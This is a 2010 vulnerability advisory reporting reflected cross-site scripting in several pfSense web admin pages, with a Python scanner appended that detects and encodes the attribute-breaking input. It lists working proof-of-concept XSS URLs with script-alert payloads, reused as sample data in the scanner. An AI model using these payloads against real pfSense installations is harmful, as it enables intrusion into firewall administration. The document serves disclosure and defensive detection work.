pfSense Cross Site Scripting

2010-11-08T00:00:00
ID PACKETSTORM:95575
Type packetstorm
Reporter dave b
Modified 2010-11-08T00:00:00

Description

                                        
"Those who cannot learn from history are doomed to repeat it." - George Santayana  
  
http://cvstrac.pfsense.org/chngview?cn=20994  
"Comment: Make scripts XSS input safe. "  
Date: 2008-Feb-11 23:33:24 (local) 2008-Feb-12 04:33:24 (UTC)  
  
So in 2010, pfSense 2 beta 4:  
  
...  
xss -> pkg_edit.php  
https://10.0.20.220/pkg_edit.php?xml=olsrd.xml&id=%22/%3E%3Cscript%3Ealert%282%29;%3C/script%3E  
  
xss -> pkg.php  
https://10.0.20.220/pkg.php?xml=jailctl.xm%27l%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
...  
  
-----------  
in pfSense 2 beta 4:  
xss -> status_graph.php  
  
https://10.0.20.220/status_graph.php?if=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
  
xss -> interfaces.php  
https://10.0.20.220/interfaces.php?if=wan%22%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
-------------  
  
And in pfSense (stable and 2 beta 4):  
http://10.0.20.222/graph.php?ifnum=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&ifname=  
or http://10.0.20.222/graph.php?ifnum=&ifname=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
  
--  
question = ( to ) ? be : ! be; -- Wm. Shakespeare  
  
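A defensive check for the request pattern listed above, as an added example that is not part of the original advisory: it percent-decodes each query parameter (repeatedly, to catch double encoding), flags values containing the characters used here to close an HTML attribute and open a tag, and returns the HTML-encoded form that is safe to echo into a page. The function names are hypothetical; the sample requests are the advisory's URLs with the host removed, plus one constructed benign request.

```python
import html
from urllib.parse import parse_qsl, unquote, urlsplit

# Characters that close an HTML attribute value or open a tag when echoed unencoded.
# Heuristic: legitimate values for these parameters are not expected to contain them.
BREAKOUT = set("\"'<>")

# Request URLs from the advisory with the host removed, plus one constructed benign request.
SAMPLE_REQUESTS = [
    "/pkg_edit.php?xml=olsrd.xml&id=%22/%3E%3Cscript%3Ealert%282%29;%3C/script%3E",
    "/pkg.php?xml=jailctl.xm%27l%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E",
    "/status_graph.php?if=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E",
    "/interfaces.php?if=wan%22%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E",
    "/graph.php?ifnum=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&ifname=",
    "/graph.php?ifnum=&ifname=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E",
    "/status_graph.php?if=wan",  # constructed benign request
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is also inspected."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_request(url):
    """Return (path, parameter, decoded value, HTML-encoded value) for each risky parameter."""
    parts = urlsplit(url)
    findings = []
    # parse_qsl already decodes once; fully_decode handles any further layers.
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_decode(raw)
        if BREAKOUT & set(value):
            findings.append((parts.path, name, value, html.escape(value, quote=True)))
    return findings

def flagged_parameters(requests):
    """Return the (path, parameter) pairs flagged across a list of request URLs."""
    return [(path, name) for url in requests for path, name, _, _ in scan_request(url)]

if __name__ == "__main__":
    for url in SAMPLE_REQUESTS:
        for path, name, value, encoded in scan_request(url):
            print(f"{path} param={name!r} decoded={value!r} encoded={encoded!r}")
```

The encoded value in each finding is what the page should have emitted: with `"`, `'`, `<` and `>` converted to entities, the input stays inside the attribute value instead of becoming markup.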